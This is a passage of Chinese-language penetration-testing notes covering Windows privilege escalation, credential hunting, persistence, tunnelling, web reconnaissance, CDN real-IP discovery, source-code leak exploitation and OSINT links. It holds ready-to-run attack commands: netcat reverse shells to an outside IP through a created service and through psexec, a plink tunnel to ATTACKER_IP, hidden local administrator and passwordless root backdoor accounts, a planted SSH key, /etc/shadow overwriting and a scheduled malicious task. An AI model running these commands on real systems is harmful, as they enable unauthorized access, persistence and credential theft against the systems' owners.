//look for (F)ull, (M)odify, (W)rite
```

**始终安装升高的MSI**

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

#### Windows存储凭证

```
c:\unattend.xml
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
dir /s *cred* == *pass* == *.conf

# Windows Autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Registry
reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s
```

#### Unquoted 服务路径

```
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" |findstr /i /v """
```

#### Persistence via 服务

```
# cmd
sc create spotlessSrv binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""

# powersehll
New-Service -Name EvilName -DisplayName EvilSvc -BinaryPathName "'C:\Program Files\NotEvil\back.exe'" -Description "Not at all"
```

**端口转发/ SSH隧道**

**SSL:本地端口转发**

```
# 监听本地端口8080，并通过SSH_SERVER将传入流量转发到REMOT_HOST: port
# 通过SSH_SERVER访问被防火墙阻止的主机;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER
```

**SSH:端口动态转发**

```
# 监听本地端口8080。进入127.0.0.1:8080的流量通过SSH_SERVER将其转发到最终目的地
# 场景:通过SSH隧道代理您的web流量，或通过受损的DMZ框访问内部网络上的主机;
ssh -D 127.0.0.1:8080 user@SSH_SERVER
```

**SSH:远程端口转发**

```
# 场景:通过SSH隧道代理您的web流量，或通过受损的DMZ框访问内部网络上的主机;
# 在非路由网络上暴露RDP;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.01:80 -l root -pw pw ATTACKER_IP
```

**代理隧道**

```
# 打开本地端口127.0.0.1:5555。进入5555的流量通过PROXY_HOST:3128代理到DESTINATION_HOST
# 场景:远程主机运行SSH，但是它只绑定到127.0.0.1，但是您想要到达它;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555
```

**HTTP隧道:SSH Over HTTP**

```
# 服务器-打开端口80。将所有传入流量重定向到localhost:80到localhost:22
hts -F localhost:22 80

# 客户端-打开端口8080。重定向所有传入流量到localhost:8080到192.168.1.15:80
htc -F 8080 192.168.1.15:80

# 客户端-连接到本地主机:8080 ->得到隧道到192.168.1.15:80 ->得到重定向到192.168.1.15:22
ssh localhost -p 8080
```

**Netsh—Windows端口转发**

```
# requires admin
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
```

**RunAs /启动进程As**

**PowerShell**

```
# Requires PSRemoting
$username = 'Administrator';$password = '1234test';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName COMPUTER_NAME -Command { whoami }

# without PSRemoting
cmd> powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))

# without PS Remoting, with arguments
cmd> powershell -command "start-process cmd.exe -argumentlist '/c calc' -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))"
```

**CMD**

```
# 需要交互式控制台
runas /user:userName cmd.exe
```

**PsExec**

```
psexec -accepteula -u user -p password cmd /c c:\temp\nc.exe 10.11.0.245 80 -e cmd.exe
```

**Pth-WinExe**

```
pth-winexe -U user%pass --runas=user%pass //10.1.1.1 cmd.exe
```

#### 递归地查找隐藏文件: Windows

```
dir /A:H /s "c:\program files"
```

#### 文件搜索

```
# 查询本地db以快速查找文件。在执行locate之前执行updatedb。
locate passwd 

# 显示哪个文件将在当前环境中执行，这取决于$PATH环境变量;
which nc wget curl php perl python netcat tftp telnet ftp

# 以/etc开头递归搜索*.conf文件(不区分大小写);
find /etc -iname *.conf
```

#### 后开发和维护访问

#### 浏览注册蜂巢

```
hivesh /registry/file
```

#### 解密RDG密码

远程桌面连接管理器的密码可以在加密的同一计算机/帐户上解密:

```
Copy-Item 'C:\Program Files (x86)\Microsoft\Remote Desktop Connection Manager\RDCMan.exe C:\temp\RDCMan.dll’
Import-Module C:\temp\RDCMan.dll
$EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings
[RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)
```

#### 解密VNC密码

```
wine vncpwdump.exe -k key
```

#### 创建用户并添加本地管理员

```
net user spotless spotless /add & net localgroup Administrators spotless /add
```

#### 隐藏新创建的本地管理员

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v spotless /d 0 /f
```

#### 创建SSH授权密钥

```
mkdir /root/.ssh 2>/dev/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' >> /root/.ssh/authorized_keys
```

#### 创建没有密码的后门用户

```
echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd

# 很少需要，但是如果您需要通过使用useradd和passwd向先前创建的用户添加密码，则不工作。Pwd是“kali
sed 's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./' /etc/shadow > /etc/s2; cat /etc/s2 > /etc/shadow; rm /etc/s2
```

#### 创建另一个root用户

```
useradd -u0 -g0 -o -s /bin/bash -p `openssl passwd yourpass` rootuser
```

#### 生成OpenSSL密码

```
openssl passwd -1 password 
# output $1$YKbEkrkZ$7Iy/M3exliD/yJfJVeTn5.
```

#### 持续的后门

```
# Launch evil.exe every 10 minutes
schtasks /create /sc minute /mo 10 /tn "TaskName" /tr C:\Windows\system32\evil.exe
```

### 代码执行/应用程序白名单绕过

#### Ieframe.dll

{% tabs %} {% tab title="cmd" %}

```
rundll32 c:\windows\system32\ieframe.dll,OpenURL c:\temp\test.url
```

{% endtab %}

{% tab title="test.url" %}

```
[internetshortcut]
url=c:\windows\system32\calc.exe
```

{% endtab %} {% endtabs %}

This was inspired by and forked/adapted/updated from [Dostoevsky's Pentest Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes).<br>


# 基础信息收集

## 脚本语言信息收集

常见的脚本语言有PHP,ASP,ASPX,ASPX,JSP等

{% hint style="success" %}

* 首页文件,通常访问首页的时候会有后缀index.php,index.asp,index.aspx,index.jsp,index.do等
* 审查元素,通过审查可以看到请求头和响应头,可根据请求头或者响应头判断脚本语言
* robots.txt文件,robots.txt文件是每个网站的搜索引擎蜘蛛爬取指引文件
* 网站源码中,网站源码也会包含脚本语言文件
* 搜索引擎语法,比如：site:xxx.com inurl:php
* 报错法,如果一些网站没有设置404错误界面,或者设置了404错误界面,我们也可以根据500错误页面判断
* 等等...
  {% endhint %}

## 数据库信息收集

常见的数据库有mysql,sqlserver,sqllite,oracle等,还有一些nosql数据库，例如：redis,mangodb,es等

### fuzz模糊测试，每种语言都有常见对应的数据库

```
php---mysql
asp---sqlserver access
jsp---oracle
```

根据经验可以进行模糊测试

### 查看数据库开放端口

```
Oracle---1521
MySQL---3306
SQL Server---1433
Sybase---5000
DB2---5000
PostgreSQL---5432
MongoDB---27017
Redis---6379
Memcached---11211
```

### 数据库报错信息

### 信息泄露文件,phpinfo.php

### 等等...

## 中间件信息收集

常见中间件有IIS,Apache,Nginx,Tomcat,jBoss,WebLogic,Lighttpd,IBM WebSphere,Tengine等等

{% hint style="success" %}

* 请求头响应头
* fuzz模糊测试，根据脚本语言和数据库来判断
* 报错信息
* 404错误信息
* http请求指纹
* 也可以根据旁站来判断
* 等等...漏洞扫描器或者爱站蜘蛛引擎通常更方便一些
  {% endhint %}

## 操作系统信息收集

常见的操作系统就是linux,windows,mac

{% hint style="success" %}

* 最常见的方法就是大小写,linux是区分大小写的
* 指纹识别，nmap工具也会模糊测试出操作系统类型
* 也是fuzz模糊测试法，根据前面信息基本可以判断操作系统类型
* 端口测试法，linux经常会开放22端口,windows则会开放3389,也有可能改端口,通常nmap工具也会识别出来
* 等等...
  {% endhint %}

## 后台信息收集

{% hint style="info" %}

* 枚举方法,通过御剑,dirb,dirsearch,dirmap等工具
* 信息泄露,有时robots.txt,sitemap.xml等文件会把后台写在里面
* 搜索引擎探测,例如：site:xxx.com 后台
* 蜘蛛爬取,burpsuite有蜘蛛爬取模块,可以查看爬取的地址
* 等等...取后台的方法比较多,有时候也不那么好取,根据实际情况来出发
  {% endhint %}


# OSINT Web信息收集

## 综合信息收集

[爱站网](https://www.aizhan.com/)

[站长工具](http://tool.chinaz.com/)

[semrush](https://www.semrush.com/)

[Alexa排名](http://www.alexa.cn)

## 网站备案及单位信息收集

[ICP/IP地址/域名信息备案管理系统](https://beian.miit.gov.cn/)

## WHOIS信息收集

[阿里云](https://whois.aliyun.com/whois/domain/)

[WHOIS365](https://www.whois365.com/cn/)

等...太多了

## 旁站信息收集

旁站查询接口，感谢原作

```
http://cn.bing.com/search?q=ip%3A220.181.111.85
http://dns.aizhan.com/?q=www.baidu.com
http://domains.yougetsignal.com/domains.php?remoteAddress=lcx.cc
http://i.links.cn/sameip/61.164.241.103.html
http://ip.robtex.com/
http://rootkit.net.cn/index.aspx
```

查c段的话：

```
http://c.wlan.im/
http://sameip.org/
http://tool.114la.com/sameip/
http://tool.chinaz.com/Same/
http://www.114best.com/ip/114.aspx?w=61.164.241.103
http://www.yougetsignal.com/tools/web-sites-on-web-server/，菜刀里面的。
```

域名解析IP地址历史记录查询：

小网站从无CDN到有CDN，会有一个IP变化的过程，netcraft.com会记录下来，也可以做参考：

```
http://toolbar.netcraft.com/site_report?url=lcx.cc
```

域名Whois历史记录查询：

```
http://www.benmi.com/whoishistory/
```

## C段信息收集

### NMAP

```
nmap -sn -PE -n 10.60.17.1/24 
sn 不扫描端口
-PE ICMP扫描
-n 不进行dns解析
```

### masscan

```
masscan -p 80 10.60.17.1/24 --rate 1000
-p：设置端口
--rate：发包速率
```

### ZMAP

### [Webscan](http://www.webscan.cc/)

## 子域名信息收集

Google Hacking 搜索引擎查询

### [DNS域传送漏洞](http://drops.xmd5.com/static/drops/tips-2014.html)

### 父站点爬取

### [IP反查](http://www.cnblogs.com/dongchi/p/4155368.html)

### [Forward-DNS](https://github.com/rapid7/sonar/wiki/Forward-DNS)

### 枚举法：子域名挖掘机

### HOST

### Dig

### [Dnsenum](https://tools.kali.org/information-gathering/dnsenum)

### [Dnsmap](https://tools.kali.org/information-gathering/dnsmap)

### [Fierce](https://tools.kali.org/information-gathering/fierce)

### [netcraft](http://toolbar.netcraft.com/site_report?url=xxx.com)

### 历史记录查询

### [DNSdumpster](https://dnsdumpster.com/)

### [SecurityTrails](https://securitytrails.com/)

### [DNSDB](https://dnsdb.io/zh-cn/)

## 真实IP信息收集

感谢原作

### 方法1:查询历史DNS记录

#### **1）查看 IP 与 域名绑定的历史记录，可能会存在使用 CDN 前的记录，相关查询网站有：**

```
https://dnsdb.io/zh-cn/ #DNS查询
https://x.threatbook.cn/ #微步在线
http://toolbar.netcraft.com/site_report?url= #在线域名信息查询
http://viewdns.info/ #DNS、IP等查询
https://tools.ipip.net/cdn.php #CDN查询IP
```

#### **2）利用SecurityTrails平台，攻击者就可以精准的找到真实原始IP。他们只需在搜索字段中输入网站域名，然后按Enter键即可，这时“历史数据”就可以在左侧的菜单中找到。**

如何寻找隐藏在CloudFlare或TOR背后的真实原始IP

除了过去的DNS记录，即使是当前的记录也可能泄漏原始服务器IP。例如，MX记录是一种常见的查找IP的方式。如果网站在与web相同的服务器和IP上托管自己的

邮件服务器，那么原始服务器IP将在MX记录中。

### 方法2:查询子域名

毕竟 CDN 还是不便宜的，所以很多站长可能只会对主站或者流量大的子站点做了 CDN，而很多小站子站点又跟主站在同一台服务器或者同一个C段内，此时就可以通过查询子域名对应的 IP 来辅助查找网站的真实IP。

下面介绍些常用的子域名查找的方法和工具：

#### **1）微步在线(<https://x.threatbook.cn/>)**

上文提到的微步在线功能强大，黑客只需输入要查找的域名(如baidu.com)，点击子域名选项就可以查找它的子域名了，但是免费用户每月只有5次免费查询机会。

#### **2）Dnsdb查询法。(<https://dnsdb.io/zh-cn/>)**

黑客只需输入baidu.com type:A就能收集百度的子域名和ip了。

#### **3）Google 搜索**

Google site:baidu.com -www就能查看除www外的子域名

#### **4）各种子域名扫描器**

这里，主要为大家推荐子域名挖掘机和lijiejie的subdomainbrute(<https://github.com/lijiejie/subDomainsBrute>)

子域名挖掘机仅需输入域名即可基于字典挖掘它的子域名，

Subdomainbrute以windows为例，黑客仅需打开cmd进入它所在的目录输入Python subdomainbrute.py baidu.com --full即可收集百度的子域名，

注：收集子域名后尝试以解析ip不在cdn上的ip解析主站，真实ip成功被获取到。

### 方法3：网络空间引擎搜索法

常见的有以前的钟馗之眼，shodan，fofa搜索。以fofa为例，只需输入：title:“网站的title关键字”或者body：“网站的body特征”就可以找出fofa收录的有这些关键

字的ip域名，很多时候能获取网站的真实ip，

### 方法4:利用SSL证书寻找真实原始IP

使用给定的域名

假如你在xyz123boot.com上托管了一个服务，原始服务器IP是136.23.63.44。 而CloudFlare则会为你提供DDoS保护，Web应用程序防火墙和其他一些安全服务，以保护你的服务免受攻击。为此，你的Web服务器就必须支持SSL并具有证书，此时CloudFlare与你的服务器之间的通信，就像你和CloudFlare之间的通信一样，会被加密（即没有灵活的SSL存在）。这看起来很安全，但问题是，当你在端口443（<https://136.23.63.44:443>）上直接连接到IP时，SSL证书就会被暴露。

此时，如果攻击者扫描0.0.0.0/0，即整个互联网，他们就可以在端口443上获取在xyz123boot.com上的有效证书，进而获取提供给你的Web服务器IP。

目前Censys工具就能实现对整个互联网的扫描，Censys是一款用以搜索联网设备信息的新型搜索引擎，安全专家可以使用它来评估他们实现方案的安全性，而黑客则可以使用它作为前期侦查攻击目标、收集目标信息的强大利器。Censys搜索引擎能够扫描整个互联网，Censys每天都会扫描IPv4地址空间，以搜索所有联网设备并收集相关的信息，并返回一份有关资源（如设备、网站和证书）配置和部署信息的总体报告。

而攻击者唯一需要做的就是把上面用文字描述的搜索词翻译成实际的搜索查询参数。

xyz123boot.com证书的搜索查询参数为：parsed.names：xyz123boot.com

只显示有效证书的查询参数为：tags.raw：trusted

攻击者可以在Censys上实现多个参数的组合，这可以通过使用简单的布尔逻辑来完成。

组合后的搜索参数为：parsed.names: xyz123boot.com and tags.raw: trusted

Censys将向你显示符合上述搜索条件的所有标准证书，以上这些证书是在扫描中找到的。

要逐个查看这些搜索结果，攻击者可以通过单击右侧的“Explore”，打开包含多个工具的下拉菜单。What's using this certificate? > IPv4 Hosts

此时，攻击者将看到一个使用特定证书的IPv4主机列表，而真实原始 IP就藏在其中。

你可以通过导航到端口443上的IP来验证，看它是否重定向到xyz123boot.com？或它是否直接在IP上显示网站？

使用给定的SSL证书

如果你是执法部门的人员，想要找出一个隐藏在cheesecp5vaogohv.onion下的儿童色情网站。做好的办法，就是找到其原始IP，这样你就可以追踪到其托管的服

务器，甚至查到背后的运营商以及金融线索。

隐藏服务具有SSL证书，要查找它使用的IPv4主机，只需将"SHA1 fingerprint"（签名

证书的sha1值）粘贴到Censys IPv4主机搜索中，即可找到证书，使用此方法可以轻松找到配置错误的Web服务器。

### 方法5:利用HTTP标头寻找真实原始IP

借助SecurityTrails这样的平台，任何人都可以在茫茫的大数据搜索到自己的目标，甚至可以通过比较HTTP标头来查找到原始服务器。

特别是当用户拥有一个非常特别的服务器名称与软件名称时，攻击者找到你就变得更容易。

如果要搜索的数据相当多，如上所述，攻击者可以在Censys上组合搜索参数。假设你正在与1500个Web服务器共享你的服务器HTTP标头，这些服务器都发送的是

相同的标头参数和值的组合。而且你还使用新的PHP框架发送唯一的HTTP标头（例如：X-Generated-Via：XYZ框架），目前约有400名网站管理员使用了该框

架。而最终由三个服务器组成的交集，只需手动操作就可以找到了IP，整个过程只需要几秒钟。

例如，Censys上用于匹配服务器标头的搜索参数是80.http.get.headers.server :，查找由CloudFlare提供服务的网站的参数如下：

80.http.get.headers.server:cloudflare

### 方法6:利用网站返回的内容寻找真实原始IP

如果原始服务器IP也返回了网站的内容，那么可以在网上搜索大量的相关数据。

浏览网站源代码，寻找独特的代码片段。在JavaScript中使用具有访问或标识符参数的第三方服务（例如Google Analytics，reCAPTCHA）是攻击者经常使用的方法。

以下是从HackTheBox网站获取的Google Analytics跟踪代码示例：

ga（'create'，'UA-93577176-1'，'auto'）; 可以使用80.http.get.body：参数通过body/source过滤Censys数据，不幸的是，正常的搜索字段有局限性，但你可以在Censys请求研究访问权限，该权限允许你通过Google BigQuery进行更强大的查询。

Shodan是一种类似于Censys的服务，也提供了http.html搜索参数。

搜索示例：<https://www.shodan.io/search?query=http.html%3AUA-32023260-1>

### **方法7:使用国外主机解析域名**

国内很多 CDN 厂商因为各种原因只做了国内的线路，而针对国外的线路可能几乎没有，此时我们使用国外的主机直接访问可能就能获取到真实IP。

### 方法8:网站漏洞查找

```
1）目标敏感文件泄露，例如：phpinfo之类的探针、GitHub信息泄露等。
2）XSS盲打，命令执行反弹shell，SSRF等。
3）无论是用社工还是其他手段，拿到了目标网站管理员在CDN的账号，从而在从CDN的配置中找到网站的真实IP。
```

### 方法9:网站邮件订阅查找

RSS邮件订阅，很多网站都自带 sendmail，会发邮件给我们，此时查看邮件源码里面就会包含服务器的真实 IP 了。

### 方法10：用 Zmap、masscan扫全网

需要找 xiaix.me 网站的真实 IP，我们首先从 apnic 获取 IP 段，然后使用 Zmap 的 banner-grab 扫描出来 80 端口开放的主机进行 banner 抓取，最后在 http-req

中的 Host 写 xiaix.me。

```
#扫描全网，22端口，不扫exclude.txt 里面的IP，发包速率选择100000 ，结果输出到22-output.txt，不ping，不解析DNS。
masscan 0.0.0.0/0 -p 22 --excludefile exclude.txt --max-rate 100000 -oL 22-output.txt -Pn -n
#默认最大速率进行SYN扫描，现在最大2M速度进行扫描，22端口，探测目标上限数量为900，探测结果上限为100，不探测backlist里面的IP，扫描数据包的源端口设定为80-90，扫描目标为10.0.0.0/8 192.168.0.0/16
zmap -B 2M -p 22 -n 900 -N 100 -o 22-output.txt -b backlist.txt -s 80-90 10.0.0.0/8 192.168.0.0/16
#默认最大速率进行SYN扫描，现在最大2M速度进行扫描，22端口，探测目标上限数量为900，探测结果上限为100，不探测backlist里面的IP，扫描数据包的源端口设定为80-90，使用udp扫描，全网扫描
zmap -B 2M -p 22 -n 900 -N 100 -o 22-output.txt -b backlist.txt -s 80-90 -M udp 0.0.0.0/0
```

```
http://ftp.apnic.net/stats/apnic/delegated-apnic-latest	#全网IP
http://www.ipdeny.com/ipblocks/	#全网IP
./zgrab -input-file=hk.res -senders=2000 -data-"./http-reg" | grep -E 'memberlogin' >> x.txt
```

#### Zmap

```
zmap -w CN.txt -p 80 -o 80.txt
cat http-req#编辑一下如下内容
#GET / HTTP/1.1
#Host: www.abc.com
cat 80.txt | banner-grep-tcp -c 1500 -d http-req -f assic -p 80 -t 30 -r 30 >result.txt
grep "xxx.com" result.txt | wc -l
```

#### Zgrab

```
cat *.zone | zmap -p 80 -B 200M -o world.80
cat cn.80 | ./zgrab --port 80 -http-user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" -timeout=30 -senders=2000 -data="./http-req" --output-file=cnresult.txt
cat cn.443 | ./zgrab --port 443 --tls -http-user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" -timeout=30 -senders=2000 -data="./http-req" --output-file=cnresult.txt
cat cnresult.txt |grep -E "关键词" > cnpr.txt

sed -e '/aliyungf/d' cnpr.txt > cn.target 
sed -e '/cfduid/d' cnpr.txt > cn.target
```

#### 当然自动化的工具也有人写好了，w8Fuckcdn

```
https://github.com/boy-hack/w8fuckcdn
usage: python get_ips.py -d baidu.com
```

### 方法11：F5 LTM解码法

当服务器使用F5 LTM做负载均衡时，通过对set-cookie关键字的解码真实ip也可被获取，例如：Set-Cookie:

BIGipServerpool\_8.29\_8030=487098378.24095.0000，先把第一小节的十进制数即487098378取出来，然后将其转为十六进制数1d08880a，接着从后至前，以

此取四位数出来，也就是0a.88.08.1d，最后依次把他们转为十进制数10.136.8.29，也就是最后的真实ip。

### 方法12：错误配置及网站敏感文件

错误的配置：有些域名只配置了www而没有配置主域名，我们可以通过访问主域名来获取真实ip

网站敏感文件：有些敏感文件可以泄露真实IP的，比如phpinfo.php

## 邮件系统信息收集

## WEB敏感文件信息收集

感谢原作，很实用，还有很多需要实战积累

.hg源码泄漏

漏洞成因：

hg init的时候会生成.hg

e.g.<http://www.example.com/.hg/>

漏洞利用：

工具：dvcs-ripper

rip-hg.pl -v -u <http://www.example.com/.hg/>

.git源码泄漏

漏洞成因：

在运行git init初始化代码库的时候，会在当前目录下面产生一个.git的隐藏文件，用来记录代码的变更记录等等。在发布代码的时候，把.git这个目录没有删除，直

接发布了。使用这个文件，可以用来恢复源代码。

e.g. <http://www.example.com/.git/config> 漏洞利用：

工具：

GitHack

GitHack.py <http://www.example.com/.git/>

dvcs-ripper

rip-git.pl -v -u <http://www.example.com/.git/>

.DS\_Store文件泄漏

漏洞成因:

在发布代码时未删除文件夹中隐藏的.DS\_store，被发现后，获取了敏感的文件名等信息。

漏洞利用:

<http://www.example.com/.ds_store>

注意路径检查

工具：

dsstoreexp

python ds\_store\_exp.py <http://www.example.com/.DS_Store>

网站备份压缩文件

在网站的使用过程中，往往需要对网站中的文件进行修改、升级。此时就需要对网站整站或者其中某一页面进行备份。当备份文件或者修改过程中的缓存文件因为

各种原因而被留在网站web目录下，而该目录又没有设置访问权限时，便有可能导致备份文件或者编辑器的缓存文件被下载，导致敏感信息泄露，给服务器的安全

埋下隐患。

漏洞成因及危害:

该漏洞的成因主要有以下两种：

服务器管理员错误地将网站或者网页的备份文件放置到服务器web目录下。

编辑器在使用过程中自动保存的备份文件或者临时文件因为各种原因没有被删除而保存在web目录下。

漏洞检测:

该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载，利用。源代码中所包含的各类敏感信息，如服务器数据库连接信息，服务器配置信息等会因此

而泄露，造成巨大的损失。被泄露的源代码还可能会被用于代码审计，进一步利用而对整个系统的安全埋下隐患。

```
.rar.zip.7z.tar.gz.bak.swp.txt.html
```

SVN导致文件泄露

Subversion，简称SVN，是一个开放源代码的版本控制系统，相对于的RCS、CVS，采用了分支管理系统，它的设计目标就是取代CVS。互联网上越来越多的控制

服务从CVS转移到Subversion。

Subversion使用服务端—客户端的结构，当然服务端与客户端可以都运行在同一台服务器上。在服务端是存放着所有受控制数据的Subversion仓库，另一端是

Subversion的客户端程序，管理着受控数据的一部分在本地的映射（称为“工作副本”）。在这两端之间，是通过各种仓库存取层（Repository Access，简称RA）

的多条通道进行访问的。这些通道中，可以通过不同的网络协议，例如HTTP、SSH等，或本地文件的方式来对仓库进行操作。

e.g.<http://vote.lz.taobao.com/admin/scripts/fckeditor.266/editor/.svn/entries>

漏洞利用:

工具：

dvcs-ripper

rip-svn.pl -v -u <http://www.example.com/.svn/>

Seay-Svn

WEB-INF/web.xml泄露

WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件，必须通过web.xml文件对要访问的文件进行相应映射才能访问。

WEB-INF主要包含一下文件或目录：

/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。

/WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中

/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件

/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。

/WEB-INF/database.properties：数据库配置文件

漏洞成因：

通常一些web应用我们会使用多个web服务器搭配使用，解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用

这种架构的时候，由于对静态资源的目录或文件的映射配置不当，可能会引发一些的安全问题，导致web.xml等文件能够被读取。

漏洞检测以及利用方法：

通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码。

一般情况，jsp引擎默认都是禁止访问WEB-INF目录的，Nginx 配合Tomcat做均衡负载或集群等情况时，问题原因其实很简单，Nginx不会去考虑配置其他类型引

擎（Nginx不是jsp引擎）导致的安全问题而引入到自身的安全规范中来（这样耦合性太高了），修改Nginx配置文件禁止访问WEB-INF目录就好了： location \~

^/WEB-INF/\* { deny all; } 或者return 404; 或者其他！

CVS泄漏

漏洞利用

测试的目录

<http://url/CVS/Root> 返回根信息

<http://url/CVS/Entries> 返回所有文件的结构

取回源码的命令

bk clone <http://url/name> dir

这个命令的意思就是把远端一个名为name的repo clone到本地名为dir的目录下。

查看所有的改变的命令，转到download的目录

bk changes

Bazaar/bzr

工具：

dvcs-ripper

rip-bzr.pl -v -u <http://www.example.com/.bzr/>

工具推荐

Bitkeeper

weakfilescan

参考 <https://zhuanlan.zhihu.com/p/21296806> <http://www.s2.sshz.org/post/source-code-leak/>

## WAF防火墙信息收集

Waf识别大多数是根据header来判断头信息来判断的

### [Whatwaf](https://github.com/Ekultek/WhatWaf)

### [wafw00f](https://github.com/EnableSecurity/wafw00f)

### sqlmap

### Nmap

```
nmap -p 80 --script http-waf-detect.ns xxx.com
```

## 历史漏洞信息收集

### 乌云

### CNVD

### 搜索引擎

### 知道创宇漏洞库

### exploit-db

## 端口信息收集

### Nmap

```
nmap -sT -sV -Pn -v IP
nmap -sS -p 1-65535 -v IP
```

## Google Hacking搜索引擎收录信息收集

#### [在线google hacking](https://pentest-tools.com/information-gathering/google-hacking)

## 物理路径信息收集

网站敏感文件之前讲过了敏感文件都有哪些

报错点

可以通过后台获取

web中间件报错信息，例如 IIS

搜索引擎查找error warning mysql等信息

## CMS指纹信息收集

云悉资产

[在线cms指纹识别](http://whatweb.bugscaner.com/look/)

[cmscan](https://github.com/cuijianxiong/cmscan)

[cmsIdentification](https://github.com/theLSA/cmsIdentification/)

[在线cms识别](https://pentest.gdpcisa.org/whatcms)

[onlinetools](https://github.com/iceyhexman/onlinetools)

whatweb

[godeye](https://www.godeye.vip/)

## 常见信息泄露

```
用户目录下的敏感文件
.bash_history.zsh_history.profile.bashrc.gitconfig.viminfopasswd
应用的配置文件
/etc/apache2/apache2.conf/etc/nginx/nginx.conf
应用的日志文件
/var/log/apache2/access.log/var/log/nginx/access.log
站点目录下的敏感文件
.svn/entries.git/HEADWEB-INF/web.xml.htaccess
特殊的备份文件
.swp.swo.bakindex.php~...
Python的Cache
__pycache__\__init__.cpython-35.pyc
弱密码
位数过低
字符集小
为常用密码
个人信息相关
手机号
生日
姓名
用户名
使用键盘模式做密码
敏感文件泄漏
.git
.svn
数据库
Mongo/Redis等数据库无密码且没有限制访问
加密体系
在客户端存储私钥
三方库/软件
公开漏洞后没有及时更新
```


# OSINT情报框架

## 开源情报框架

#### 培训

**<http://www.catb.org/esr/faqs/smart-questions.html>**

**Smart Questions**

**<https://netbootcamp.org/trainingprogram/>**

**NetBootCamp**

**<https://www.sans.org/sec487>**

**SANS SEC487 OSINT Class**

**<https://plessas.net/online-training>**

**Plessas**

**<https://inteltechniques.com/>**

**Open Source Intelligence Techniques**

**<http://register.automatingosint.com/>**

**AutomatingOSINT.com**

**Games**

&#x20;<https://twitter.com/quiztime> ​ Verif!cation Quiz Bot ​ <https://geoguessr.com/> ​ GeoGuesser ​ <http://www.agoogleaday.com/> ​ A Google A Day

#### 文档

**<http://timeline.knightlab.com/>**

**Timeline JS3**

**地图位置**

&#x20;<https://www.zeemaps.com/> ​ ZeeMaps ​ <http://brianfolts.com/driver/> ​ Google Maps Streetview Player ​ <http://labs.teehanlax.com/project/hyperlapse> ​ Teehan+Lax Labs - Hyperlapse ​ <https://github.com/TeehanLax/Hyperlapse.js> ​ Google Street View - Hyperlapse ​ <https://batchgeo.com/> ​ BatchGeo

**屏幕捕获**

&#x20;<https://getgreenshot.org/> ​ Greenshot (T) ​ <https://getsharex.com/> ​ ShareX (T) ​ <http://www.fraps.com/> ​ FRAPS (T)

**web抓包**

